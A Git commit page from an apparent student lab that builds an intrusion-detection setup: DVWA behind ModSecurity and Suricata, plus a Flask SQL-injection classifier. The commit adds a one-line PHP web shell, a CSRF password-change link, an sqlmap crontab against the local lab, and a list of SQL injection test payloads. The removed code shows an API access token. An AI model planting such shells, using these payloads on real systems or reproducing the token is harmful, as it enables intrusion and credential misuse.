Vomitblood/cspj-application
1
0
Fork 0
Code Issues Pull requests Packages Projects Releases Wiki Activity

asdf

Browse source
This commit is contained in:
Vomitblood 2025-02-06 06:56:15 +08:00
parent 46ff2ebe87
commit b8b66bdf13
10 changed files with 133 additions and 20 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

7
docker/dvwa/docker-compose.yml Normal file
View file

@ -0,0 +1,7 @@
services:
dvwa:
image: vulnerables/web-dvwa
container_name: dvwa
restart: always
ports:
- "80:80"

13
docker/modsecurity/docker-compose.yml
View file

@ -4,7 +4,18 @@ services:
container_name: modsecurity container_name: modsecurity
restart: always restart: always
environment: environment:
BACKEND: "http://localhost:3333" # TODO: CHANGE THIS TO SURICATA'S PORT COS INLINE BACKEND: "http://localhost:80"
SERVER_NAME: "localhost" SERVER_NAME: "localhost"
PORT: "3331" PORT: "3331"
MODSEC_AUDIT_LOG: "/var/log/modsec_audit.log"
ERRORLOG: "/var/log/modsec_error.log"
ACCESSLOG: "/var/log/apache2/access.log"
BLOCKING_PARANOIA: 4
DETECTION_PARANOIA: 4
EXECUTING_PARANOIA: 4
PARANOIA: 4
network_mode: "host" network_mode: "host"
volumes:
- "/tmp/host-fs-auditlog.log:/var/log/modsec_audit.log"
- "/tmp/host-fs-errorlog.log:/var/log/modsec_error.log"
- "/tmp/host-fs-accesslog.log:/var/log/apache2/access.log"

2
docker/suricata/docker-compose.yml
View file

@ -28,4 +28,4 @@ services:
- ./suricata/etc:/etc/suricata - ./suricata/etc:/etc/suricata
- ./suricata/logs:/var/log/suricata - ./suricata/logs:/var/log/suricata
- ./suricata/lib:/var/lib/suricata - ./suricata/lib:/var/lib/suricata
command: ["-c", "/etc/suricata/suricata.yaml", "-q 0"] command: ["-c", "/etc/suricata/suricata.yaml", "--af-packet"]

2
docker/suricata/suricata/etc/rules/suricata.rules
View file

@ -2,4 +2,4 @@
#drop http any any -> any any (msg:"asdf attempt"; content:"asdf@gmail.com"; http_client_body; nocase; sid:1000007; rev:2;) #drop http any any -> any any (msg:"asdf attempt"; content:"asdf@gmail.com"; http_client_body; nocase; sid:1000007; rev:2;)
#drop ip 192.168.0.71 any -> any any (msg:"asdfBlocking ALL traffic from 192.168.0.71"; sid:1000010; rev:1;) #drop ip 192.168.0.71 any -> any any (msg:"asdfBlocking ALL traffic from 192.168.0.71"; sid:1000010; rev:1;)
#drop http any any -> any any (msg:"dropping ALL shit"; sid:1000123; rev:1;) #drop http any any -> any any (msg:"dropping ALL shit"; sid:1000123; rev:1;)
#drop http any any -> 192.168.0.69 3333 (msg:"Blocked /health endpoint"; http.uri; content:"/health"; nocase; sid:1000008; rev:2;) #drop http any any -> 192.168.0.69 80 (msg:"Blocked /health endpoint"; http.uri; content:"/health"; nocase; sid:1000008; rev:2;)

2
docker/suricata/suricata/etc/suricata.yaml
View file

@ -8,7 +8,7 @@ vars:
EXTERNAL_NET: "any" EXTERNAL_NET: "any"
port-groups: port-groups:
HTTP_PORTS: "3333" HTTP_PORTS: "80"
# Define Suricata as an inline IPS # Define Suricata as an inline IPS
af-packet: af-packet:

5
dvwa/csrf.html Normal file
View file

@ -0,0 +1,5 @@
<html>
<body>
<a href="http://localhost:3331/vulnerabilities/csrf/?password_new=bruh&password_conf=bruh&Change=Change">asdf</a>
</body>
</html>

5
dvwa/file-inclusion Normal file
View file

@ -0,0 +1,5 @@
<?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>

65
server-ml/main.py
View file

@ -1,22 +1,55 @@
from transformers import AutoModelForSequenceClassification, AutoTokenizer
from flask import Flask, request, jsonify from flask import Flask, request, jsonify
import torch
from transformers import MobileBertTokenizer, MobileBertForSequenceClassification
ACCESS_TOKEN = "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" # Initialize Flask app
app = Flask(__name__) app = Flask(__name__)
model_path = "maheshj01/sql-injection-classifier" # Set device (GPU if available, otherwise CPU)
model = AutoModelForSequenceClassification.from_pretrained(model_path, token=ACCESS_TOKEN) device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
tokenizer = AutoTokenizer.from_pretrained(model_path, token=ACCESS_TOKEN)
# Function to classify a SQL query # Load tokenizer and model
def classify_query(query): tokenizer = MobileBertTokenizer.from_pretrained("google/mobilebert-uncased")
inputs = tokenizer(query, return_tensors="pt", truncation=True, padding=True) model = MobileBertForSequenceClassification.from_pretrained("cssupport/mobilebert-sql-injection-detect")
outputs = model(**inputs) model.to(device)
prediction = outputs.logits.argmax(-1).item() model.eval()
return "Vulnerable" if prediction == 1 else "Secure"
# Example usage # Function to predict SQL injection
query = "SELECT Column" def predict(text):
result = classify_query(query) inputs = tokenizer(text, padding=False, truncation=True, return_tensors="pt", max_length=512)
print(f"The query is classified as: {result}") input_ids = inputs["input_ids"].to(device)
attention_mask = inputs["attention_mask"].to(device)
with torch.no_grad():
outputs = model(input_ids=input_ids, attention_mask=attention_mask)
logits = outputs.logits
probabilities = torch.softmax(logits, dim=1)
predicted_class = torch.argmax(probabilities, dim=1).item()
confidence = probabilities[0][predicted_class].item()
return predicted_class, confidence
# Define API endpoint
@app.route("/predict", methods=["POST"])
def classify_query():
data = request.json
if "query" not in data:
return jsonify({"error": "Missing 'query' in request"}), 400
query = data["query"]
predicted_class, confidence = predict(query)
# Thresholding (if confidence > 0.7, mark as SQL Injection)
is_vulnerable = predicted_class == 1 and confidence > 0.7
result = {
"query": query,
"classification": "SQL Injection Detected" if is_vulnerable else "No SQL Injection Detected",
"confidence": round(confidence, 2)
}
return jsonify(result)
# Run Flask server
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000, debug=True)

46
server-ml/test-cases.md Normal file
View file

@ -0,0 +1,46 @@
# Test Cases
## 1. Basic test cases
[Good] `SELECT _ FROM users WHERE id = 1`
[Bad] `SELECT _ FROM users WHERE id = 1 OR 1=1`
## 2. Authentication bypass cases
[Bad] `SELECT _ FROM users WHERE username = 'admin' --`
[Bad] `SELECT _ FROM users WHERE username = 'admin' #`
[Bad] `SELECT \* FROM users WHERE username = 'admin' OR '1'='1'`
## 3. Union based injection cases
[Bad] `SELECT id, username FROM users WHERE id = 1 UNION SELECT null, 'hacker'`
[Bad] `SELECT id, username FROM users WHERE id = 1 UNION SELECT 1, 'hacked' FROM dual`
[Bad] `SELECT database() UNION SELECT 1`
## 4. Error based injection cases
[Bad] `SELECT _ FROM users WHERE id = 1 AND (SELECT 1 FROM users WHERE id=2)=1`
[Bad] `SELECT _ FROM users WHERE id = (SELECT COUNT(\*) FROM users)`
## 5. Blind SQL injection cases
[Bad] `SELECT _ FROM users WHERE id = 1; WAITFOR DELAY '00:00:10' --`
[Bad] `SELECT _ FROM users WHERE username = 'admin' AND 1=1`
## 6. Hex and Base64 encoded injection cases
[Bad] `SELECT _ FROM users WHERE username = 0x61646D696E`
[Bad] `SELECT _ FROM users WHERE username = 'YWRtaW4='`
## 7. False positives cases
[Good] `SELECT _ FROM users WHERE id = 5`
[Good] `SELECT users.name, orders.amount FROM users JOIN orders ON users.id = orders.user_id`
[Good] `SELECT _ FROM users WHERE username = ? AND password = ?`
## 8. Edge cases
[Good] `""`
[Bad] `'; --`
[Good] `12345`
[Good] `asdkjhasdkjh`

6
sqlmap/crontab Normal file
View file

@ -0,0 +1,6 @@
@reboot sleep 10 && cd /home/vomitblood/build/cspj-application/docker/dvwa && docker compose up -d && sleep 30 && sqlmap -u "http://localhost:80/vulnerabilities/sqli/?id=234&Submit=Submit" --cookie="PHPSESSID=l38mpsp9ksla91tnvglti5jur6; security=low" --tables --batch >> /home/vomitblood/sqlmap.log 2>&1
# runs the script on every system startup
# starts the dvwa in the background
# then runs sqlmap
# log all outputs and errors